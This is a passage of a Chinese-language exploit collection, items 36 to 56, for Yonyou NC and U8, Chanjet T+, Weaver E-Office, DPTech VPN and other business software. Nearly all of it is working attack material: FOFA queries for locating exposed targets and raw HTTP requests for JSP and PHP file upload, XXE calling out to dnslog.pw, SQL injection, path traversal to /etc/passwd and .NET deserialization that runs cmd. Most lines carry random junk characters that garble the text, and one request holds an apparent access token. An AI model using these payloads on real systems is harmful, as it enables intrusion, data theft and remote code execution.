POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.12 v3 y. s! N( }9 |* B
Host: 203.25.218.166:8888' f+ S4 }6 z$ R) L$ V f
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info4 Z: X& s% E8 ~: |% ~5 K; M
Accept-Encoding: gzip, deflate$ T$ ?& y1 ?) e2 |* M
Accept: */** T* k2 x* m% y; ^0 q
Connection: close
: r5 Z0 l. c( f$ R$ zaccessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA5 u" {; c0 n9 p
Content-Length: 1907 I8 z4 R$ d$ j1 H# F
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0
5 e$ V5 L& l) \ D9 Z$ ?+ V8 t+ Z' L
--fd28cb44e829ed1c197ec3bc71748df05 S6 ]+ ]( ^( F3 d, e, |
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"
. D @# J6 y* r9 U: K- M
- H, h6 H- K8 z7 J<%out.println(1111*1111);%>: d% i# \: s+ ?9 ^
--fd28cb44e829ed1c197ec3bc71748df0--
" ~1 |3 \6 z- u, U7 @# M! f4 N! n0 F5 J
& c- R% D" C$ b m$ [36. 用友NC-Cloud soapFormat XXE
( l/ F( G+ |2 j/ @" V! A: b: KFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
& Q" K" q. A- K! B% K: lPOST /uapws/soapFormat.ajax HTTP/1.1
" ~2 s+ S" s7 F) P6 xHost: 192.168.40.130:8989
; z* M1 e6 u8 A" ?5 @User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0- j, {+ q7 g w% y
Content-Length: 263
! c/ U8 r% M2 R: J% ~* GAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.82 [$ u4 V# Y/ w* l
Accept-Encoding: gzip, deflate
, Y) b& u0 ~" O4 h# AAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 Y$ x e2 J% V4 EConnection: close, i: {; u W: c; l
Content-Type: application/x-www-form-urlencoded6 g5 P6 s/ M' S
Upgrade-Insecure-Requests: 1
' ^7 a" Z0 `( w* j5 }. j2 Y1 H. n s, a
msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a
& D4 t/ g; k/ @4 C; r6 y. t( T# ?) _, b% H6 F
" E1 P0 b, N/ d2 n- h37. 用友NC-Cloud IUpdateService XXE2 k# b0 Z( Z0 E0 k
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
+ S; U) K6 S4 }+ j2 G- rPOST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.13 l, Q$ `* x4 f& M
Host: 192.168.40.130:8989 P; _1 V2 Z0 m5 [3 d" m* h5 X6 ]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.363 @# b' R; M. M6 W# O
Content-Length: 421
3 J8 @* e7 I. J Z$ dAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
' h3 g$ H Z Q$ eAccept-Encoding: gzip, deflate
* K5 f W# p9 b4 j2 V6 E0 o+ s1 pAccept-Language: zh-CN,zh;q=0.9% B& x* ^* j, ^5 M; ]- \$ X; D0 g
Connection: close
$ k8 e) x+ X; C4 jContent-Type: text/xml;charset=UTF-8
# Z7 w! a# U e( lSOAPAction: urn:getResult
, {- t3 e5 d, h- m; r' gUpgrade-Insecure-Requests: 1
x, y7 B, C! f5 ]% |
( E1 c% M5 P* Y! d<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">! ^- t, a3 [( J9 I- N, q
<soapenv:Header/>
, K- _$ Q, U2 E<soapenv:Body>% c8 |4 N8 Y8 a2 E5 j$ u
<iup:getResult>0 E: F2 i. Z6 j( T9 d3 Q
<!--type: string-->
7 {+ F% c6 @* n4 L! l<iup:string><![CDATA[
! l* s f% f! G3 C. Q. u, L<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
K7 H/ M, i3 m: j& P<xxx/>]]></iup:string>6 f( Y3 W- i& q# Z
</iup:getResult>3 E, j3 K( s" a5 q# ?" O
</soapenv:Body>1 a( C, h2 S. c* W9 v
</soapenv:Envelope>
6 F2 o* T* g5 b& f
& x' x( k1 a! E7 c* T
- c7 _# S6 K0 |" f" l
J9 O$ f9 v( h4 K38. 用友U8 Cloud smartweb2.RPC.d XXE
4 k3 g: c( {2 ^; s6 DFOFA:app="用友-U8-Cloud") d H3 j0 K( w" F0 d
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
n! g5 [' M: t6 j* UHost: 192.168.40.131:8088( @" d* V/ k# c% d, @2 ~* {( b
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25: L/ E4 J# [$ k# w2 a
Content-Length: 260
0 e& L+ S3 k6 U8 `' |Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
; A/ n4 z# f5 ~3 O0 X" iAccept-Encoding: gzip, deflate6 y; J5 d, d3 ?! E/ E8 ^
Accept-Language: zh-CN,zh;q=0.9
) k1 o2 G2 Z/ y6 lConnection: close
+ D& X# @6 Y: _Content-Type: application/x-www-form-urlencoded
5 R/ a' f9 h+ k. { {* a. ?' i0 z; a- s5 }2 W0 ^% t
__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>
. o" G- N* n; n& B8 ^1 _, J4 d' s: Q6 V
1 O- ^1 i+ R; m! D5 \% i' o! T. }" g
39. 用友U8 Cloud RegisterServlet SQL注入9 T5 s4 G* T1 f1 m" {4 n G
FOFA:title="u8c"3 J8 N/ }. X- ~! N9 ]: U/ G
POST /servlet/RegisterServlet HTTP/1.1
5 r5 u7 z' z a$ p+ z) {9 P. d+ `Host: 192.168.86.128:8089
9 a X9 l7 w! w9 j6 l2 a; WUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
" b, o/ w, G4 D8 o, }: m8 O1 ^Connection: close0 }1 M% c5 Z7 H1 M* N g
Content-Length: 85
7 G( u4 s# G( l+ h8 j/ U; QAccept: */*0 w9 J$ w9 Q6 S- U+ E/ ?* g% K
Accept-Language: en4 S5 f1 D* r% J
Content-Type: application/x-www-form-urlencoded
6 }# W2 N% D6 x3 C) {2 RX-Forwarded-For: 127.0.0.1
0 I/ j# G# ]6 q+ B8 C' c* oAccept-Encoding: gzip
2 ?! N; J i9 q W" q$ A+ m) \, T; [" D! ]; }7 a
usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--
) W" B% F% w# z i# p, S$ e
& G! c' a6 E8 X2 P' _& u$ y; y
40. 用友U8-Cloud XChangeServlet XXE
0 S% f8 l+ |' ?0 R, P& _0 xFOFA:app="用友-U8-Cloud"" W: Y5 @( e5 E
POST /service/XChangeServlet HTTP/1.1
6 n+ ]$ T6 p: d: vHost: x.x.x.x# \ H0 Z. b2 x) w- q/ S
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.363 ], d! g# o* P% f3 B
Content-Type: text/xml" A5 ~! |4 t, h
Connection: close9 F6 ]* e& M3 v' e
: R" m: t; ?/ }( }6 `/ A<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>& h2 N. |6 A0 h
b0 w& o$ }1 T# z; L
: J( g0 J1 O3 U$ y3 ~* _41. 用友U8 Cloud MeasureQueryByToolAction SQL注入8 b, L; f* f- g2 s4 P, e
FOFA:app="用友-U8-Cloud"" o6 Q9 f9 X, `/ h% {
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
J9 x0 U- j; X: YHost:/ O) Y. E/ P, M
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15; s0 o% h( G' ]$ D
Content-Type: application/json3 m6 D# Q1 M4 `! B. `" P; y, g
Accept-Encoding: gzip0 b$ R: C5 f& l- j
Connection: close: ~3 }/ v$ Q9 @; `- D' [
; Z$ I+ F4 U+ d9 o& X) g$ w' b4 S, r2 G# E& H
42. 用友GRP-U8 SmartUpload01 文件上传4 O% T- Y+ p" ~" u- Z$ N
FOFA:app="用友-GRP-U8"$ z! E0 R0 N' M S0 E
POST /u8qx/SmartUpload01.jsp HTTP/1.1- {% e5 r; d" P7 Z$ R
Host: x.x.x.x
, y8 F3 J4 F- h3 A9 ^Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt# y! q6 _. A6 g& T0 d, M
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
( d0 F6 ~8 R/ j v8 H" ?9 P1 P5 R
$ _0 C6 s$ t) ^7 hPAYLOAD
0 [7 Y/ C* @5 [" I0 R# D5 ^: `" G' \* I6 W% r, i
$ K- z$ B) a$ j
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml
- M) R2 t z6 ^! I5 s; p
* `3 e& ` c0 @7 [43. 用友GRP-U8 userInfoWeb SQL注入致RCE4 W+ D' |0 O3 G; m' l! u* L! x
FOFA:app="用友-GRP-U8"- s3 T" P0 `* y0 M. V
POST /services/userInfoWeb HTTP/1.1* e/ `* D( P. U' |# v
Host: your-ip
/ o! o7 p2 y$ K: D2 C S& LUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.360 `/ M5 }5 d' l; w9 p u# O2 j' m
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7% s, F. y6 D( E; c% M
Accept-Encoding: gzip, deflate
- s4 J V. O* r4 bAccept-Language: zh-CN,zh;q=0.9
; S8 Z/ W# N; w1 T/ |% pConnection: close8 C4 T' q, \2 r; T. @6 N
SOAPAction:
5 q! D2 U. h$ ?; L) [Content-Type: text/xml;charset=UTF-8
9 Z$ X9 |$ N" v/ R
1 A! }! W2 ^2 h( f0 M, j6 |% J Y! K<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">) c. p- E) l+ |! L* F3 L: N
<soapenv:Header/>
9 ?5 m* d2 ?2 { v <soapenv:Body>. d" I/ T! p- Q
<ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
8 t& ?% {+ \7 P, j <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
* F3 T: }9 D' M3 V- e </ser:getUserNameById>
5 T# H6 a5 d! s0 U2 W </soapenv:Body>
' |- n7 S3 V) }+ c3 I9 M+ w</soapenv:Envelope>
# l' q5 P7 T7 F [; H0 J* ]4 q' d$ j2 b' I
9 ^: d# ^) E4 q& G6 X2 w5 K
44. 用友GRP-U8 bx_dj_check.jsp SQL注入7 a& @; y3 H! ^0 i& _; F
FOFA:app="用友-GRP-U8"* [( m: ?+ {- F* _" g9 m
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
! d' ]# \' s# z e7 jHost: your-ip
+ ~9 s1 u' z& f( j; P. }6 k5 jUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
- T6 K% t- l& SAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.75 H2 `1 ]2 r" o
Accept-Encoding: gzip, deflate& v: B( q+ v+ ?* D6 w& ^) p
Accept-Language: zh-CN,zh;q=0.9
4 j& [( X0 n8 X' D) Y6 RConnection: close
# ?) @$ d7 C) V4 b( s$ u! ?( z; x/ r2 W. l- E% q
3 X3 S i+ A: m5 l1 `$ \4 D0 i( Y1 p
45. 用友GRP-U8 ufgovbank XXE d! `7 V" ?0 i
FOFA:app="用友-GRP-U8"- y0 C( z/ l- C0 k9 R5 D. ]8 S
POST /ufgovbank HTTP/1.1
# @9 B( B# U' g; q6 UHost: 192.168.40.130:222- X2 Z& ~; f9 @2 U; [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
8 B4 f; [. W! }/ ~Connection: close2 ~9 j/ Q( P+ _6 i
Content-Length: 161( |6 I$ [0 p7 p0 s) A
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
4 `* o. p9 c; L8 \' ^. zAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' ^( M6 n. Z- K. G5 a- w
Content-Type: application/x-www-form-urlencoded) \5 ^& {4 `! D/ i
Accept-Encoding: gzip+ L4 ^: _8 ]2 G
z q0 A A; A% d7 KreqData=<?xml version="1.0"?>' b) D t2 U( g1 |
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest
" O+ ?! U! i- |7 u
- `" l) E6 ^0 E
4 I1 d! x" f, k46. 用友GRP-U8 sqcxIndex.jsp SQL注入
0 _( r/ ?5 c/ F O% O$ E- UFOFA:app="用友-GRP-U8"1 l. q/ U9 p2 k
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
. c j6 K: v/ h% B2 z9 T# XHost: your-ip
8 U% z; C+ F6 j A; yUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
) I( Q) t3 P: X, `5 @Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7# `& s7 C# ^8 T) N+ I7 O& R7 q
Accept-Encoding: gzip, deflate- S( o, | e& d
Accept-Language: zh-CN,zh;q=0.9
) o$ O; ?: p1 e0 A- L" }Connection: close3 L: R- V9 W) i+ v; ?3 ^7 c
5 U8 a" u8 [! ^6 Y8 H( r7 j7 [5 ?/ Z3 E
47. 用友GRP A++Cloud 政府财务云 任意文件读取
1 h0 e1 H+ ?) ~/ z& l# [FOFA:body="/pf/portal/login/css/fonts/style.css"
3 I- B5 a4 {9 j; ?# _) kGET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1' @7 |/ ]$ h. d& t! [) s1 y5 A
Host: x.x.x.x, M1 J5 w$ O L: T. @
Cache-Control: max-age=0
# S; x. Y6 H+ _( j3 Q6 u3 hUpgrade-Insecure-Requests: 1
9 H. F8 I) T3 W+ hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
$ p! [4 I! Y' G2 e4 B% xAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
6 f" F/ o2 { e. G7 R+ V9 g. C, bAccept-Encoding: gzip, deflate, br+ u3 ?. e) ^7 ~5 r! m
Accept-Language: zh-CN,zh;q=0.9* E% I6 P2 @7 P& z( ~2 n$ T
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
# m- d* d: O3 g- Z+ @Connection: close) H0 M' \# Y1 K3 H: T5 Z
. @; v6 G* K) {& `% c) w( g" w" K8 L7 V8 O
4 D* c5 S/ ~+ T+ C C+ [
48. 用友U8 CRM swfupload 任意文件上传 w( ]7 J& a: {3 D- \
FOFA:title="用友U8CRM"( c2 V" K; w0 r1 q
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1; Y3 U' x$ q9 |5 _- X- J( [ Q
Host: your-ip/ ?1 z6 A1 J0 L- h& {
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.08 [ ]2 F4 O3 J/ J
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8: A2 P, D' a- @( G
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2. d" L3 ?% M/ q5 Y
Accept-Encoding: gzip, deflate3 Q8 n/ P, x% |5 X
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855
$ R2 n0 Q% v% e1 N------269520967239406871642430066855
# v) Z) ~! ?* q3 @* J; RContent-Disposition: form-data; name="file"; filename="s.php"
' R& Q5 O# N- T1231: _; E- ~, o3 e& a2 }. B6 @( K
Content-Type: application/octet-stream3 N3 }0 \" [- W( z+ w
------269520967239406871642430066855
/ h9 L) ^( {* e$ @- yContent-Disposition: form-data; name="upload"
3 [+ e9 x, X4 t1 ^; g4 G1 xupload* U0 A5 i7 T1 Y3 _8 e
------269520967239406871642430066855--
( r+ r$ U+ i/ \/ r5 s
. j" w$ ]0 X# t* ]9 ?3 ]* ^2 t& W" Z" M& n
49. 用友U8 CRM系统uploadfile.php接口任意文件上传) L" w1 _/ k) F+ }7 s' z% n2 j
FOFA:body="用友U8CRM"
4 i0 ]/ W4 [) k0 t, u, ] I
% n, U! f5 K9 H( j! v# E, SPOST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
) A4 C" g3 _ \& D& cHost: x.x.x.x
6 Z: Y$ ]- B( \5 K6 XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
4 m+ W- s% [) U6 Z/ AContent-Length: 329
6 B4 D: _& t2 R# yAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
, e3 r/ y4 ?- r% nAccept-Encoding: gzip, deflate
. Z' M+ I$ n3 R4 t4 K. X1 sAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2! `& P7 B' d9 ]' E$ X1 x' A
Connection: close) U1 Y' Z! o* ]7 `0 z+ w$ I. a8 f8 e
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w
3 a4 G' q8 l( X* |8 e) g& u$ A: A, e% i- s8 E8 X
-----------------------------vvv3wdayqv3yppdxvn3w
3 o0 I2 M# }0 y# N8 M. a1 ^" ?Content-Disposition: form-data; name="file"; filename="%s.php "% J6 U: [# J% V( f+ E
Content-Type: application/octet-stream
+ j% w4 v6 h' r3 Y
" H7 l( r$ b3 N: o2 p6 I" \" D2 bwersqqmlumloqa
n) U3 h& ^7 f/ D/ b-----------------------------vvv3wdayqv3yppdxvn3w
6 W7 j5 @' @% S# @Content-Disposition: form-data; name="upload"$ d% P' f8 w- \9 c4 v8 P( J
& B0 P* m/ A! w! h% o% E- F5 ~. G
upload) c: E3 s; A8 F
-----------------------------vvv3wdayqv3yppdxvn3w--2 w& J0 ]4 q+ b! P+ D
& T2 i: w6 A o( \/ u% M
- |0 h/ E. L7 Q/ i/ l, B. \( Ihttp://x.x.x.x/tmpfile/updB3CB.tmp.php, |; ?6 ?& l& E# \! I5 e* N
+ |* A9 `; y' _$ @2 s/ u5 x50. QDocs Smart School 6.4.1 filterRecords SQL注入
' b) A- F2 }3 NFOFA:body="close closebtnmodal"
p4 ?6 q ]& m4 A6 B" V SPOST /course/filterRecords/ HTTP/1.1
2 \2 s3 i1 x g SHost: x.x.x.x5 B) F* l0 p. ~8 a/ W
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
& Y; a- ~0 [! ]- NConnection: close5 ?, {) W, |5 @, `# u- k3 n' m: ?1 N
Content-Length: 224
7 }+ K/ m/ ?* J* u2 B9 PAccept: */*
' l0 R7 H G4 h% x, B' UAccept-Language: en
1 n9 w1 J1 J g1 x* l( u' cContent-Type: application/x-www-form-urlencoded+ v9 |9 W$ s, d+ ~1 |
Accept-Encoding: gzip/ p* ?9 O' L) e2 s* l" K
; Z9 W5 w) `( u& Y* p' t: l6 Psearchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1$ s) T1 x6 G. P3 M0 s3 n
$ Z; E" t9 m! e. H
! O! i- u6 \& c% n
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
8 Z7 l! ?" \# h, a6 ~: QFOFA:app="云时空社会化商业ERP系统"" N, e3 R/ A8 b( j) E r! P# c% m
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1, H4 }/ y$ C- B9 x$ ^$ {
Host: your-ip4 S2 k8 `7 T9 V C
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
# M& A+ L; L2 o) g! x' TAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.94 f; z; K" y D) r5 q/ A v, r
Accept-Encoding: gzip, deflate
8 R; v `% j! GAccept-Language: zh-CN,zh;q=0.9
/ @8 g3 o' b+ u2 FConnection: close
5 \6 J' t) o! x7 h
( {+ t) D/ P! c' v1 q2 O5 ^ c2 _- _1 w
52. 泛微E-Office json_common.php sql注入. k' ` q u0 k$ \) ?% |% o0 W
FOFA:app="泛微-EOffice"% Y' t+ B; G8 y3 Q7 @* g
POST /building/json_common.php HTTP/1.1! ?, [% \/ I( g3 J+ O, ?6 l
Host: 192.168.86.128:8097& t. u, j( v3 J! q/ _
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
* A( S7 |, _) \, B8 f& WConnection: close2 @1 C; e! [; _ F# P. b( R% L
Content-Length: 87
4 C9 |5 ]/ e, f5 X% K* FAccept: */*
! V* K$ f0 U4 M; Z8 ]+ Y3 |! fAccept-Language: en
/ p$ \9 J5 }9 D7 z& @% oContent-Type: application/x-www-form-urlencoded1 U; N4 h& v: n# ~- y; ]1 `
Accept-Encoding: gzip0 v% q5 W% t: }! c" o7 F
) t' K$ G( }) G+ a
tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333
0 O9 u% [; ]4 Z$ y8 E* a `5 U3 C! C/ ^8 V
8 d% t* _7 G' v r53. 迪普 DPTech VPN Service 任意文件上传+ O8 V3 Z2 r4 R* ~4 S5 m
FOFA:app="DPtech-SSLVPN"
0 F" ?: }! _5 O; ~9 R% ]7 z; p/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd2 r. b2 {+ ^: e! @" N/ [; W
" b7 k1 ^7 b2 s% U% }: x" w% L# v9 \
54. 畅捷通T+ getstorewarehousebystore 远程代码执行, Q" U2 P, A/ e' V4 \0 `
FOFA:app="畅捷通-TPlus"
0 `+ Q4 ?; c: h0 g- `. K n! M9 f' @第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件
! M L6 }8 P! I/ i. l"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
* n! ]' }- F, H% D
1 r0 n$ y. W+ v8 ?8 k
( k! n; N. U/ S% r5 Z4 Q- e完整数据包" M- j8 T* |+ V: O8 a+ Y @
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.14 R @0 |: G7 K# C: V# g
Host: x.x.x.x' @% n" m0 V, P9 \
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
7 I% G* ?: M g; r+ C- M/ ~) GContent-Length: 593) E0 `6 O" W& |
+ w1 u% D& _% Y. [. {. O+ b{5 P& s; g7 m$ u: Q7 ~
"storeID":{
0 ?. y% s1 l( u/ ^3 E "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",7 U! P3 w; E: u }
"MethodName":"Start",
2 }' j5 x* Y8 A8 {* d: d: x: g "ObjectInstance":{
. E& X& |* y. R0 J. c3 k "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",: [ T9 o y; r* g+ |. j
"StartInfo":{
3 d% L9 K+ B1 N' J8 h/ ?/ q- D "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",6 F, l; ]0 f# r
"FileName":"cmd",
/ H0 E7 z3 ?/ I. z" S! T "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"/ N! `# R2 O! O% ?# q. H) u
}
+ q {+ A4 n$ [( [% s$ V }
; Z0 h# F0 r4 y: T8 Q4 ~0 } }0 J( v% p* z5 z! R) I) J8 X
}
' d" D4 U* N, v& }: j* ^
& K$ ?% K/ o+ O# y2 g7 K$ t
+ y# f) M" p8 {4 y第二步,访问如下url
r1 S U1 V9 Z+ E" b/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt
, d. M" V. G: `7 T" X+ J- H7 I5 }% Y$ S7 v( G9 U6 z, Y; S( T
2 q1 c6 @. ^. i4 k8 j( D2 @
55. 畅捷通T+ getdecallusers信息泄露
4 `: ^% y8 v! qFOFA:app="畅捷通-TPlus"7 U Y; `. c+ d
第一步,通过5 \* C$ _2 v0 k( f
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie9 C/ ]; g% R" t& k1 O9 n6 u3 C/ M& O* O
第二步,利用获取到的Cookie请求
7 y- Q2 \& B0 o' g. r! j/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers
% ], i u; |3 m, K9 q8 z6 S# v7 ~% m& l5 h3 ~! m
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
3 { L# K6 [1 B2 iFOFA: app="畅捷通-TPlus"
6 c8 P) ? u9 gPOST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
% ]% s6 K2 v9 }8 N. ~+ `- `Host: x.x.x.x
) A5 r, q) g) u u$ S4 v: sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
% ]6 r: d, u0 J, Z- `! Y) [Content-Type: application/json1 T* O7 D/ u8 s: O3 N4 f
/ s5 D4 B: g$ e" y6 x* B
{
p& C! A+ F* X9 M9 z; a4 _ "storeID":{
% b, X) C, l1 |$ w5 q "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
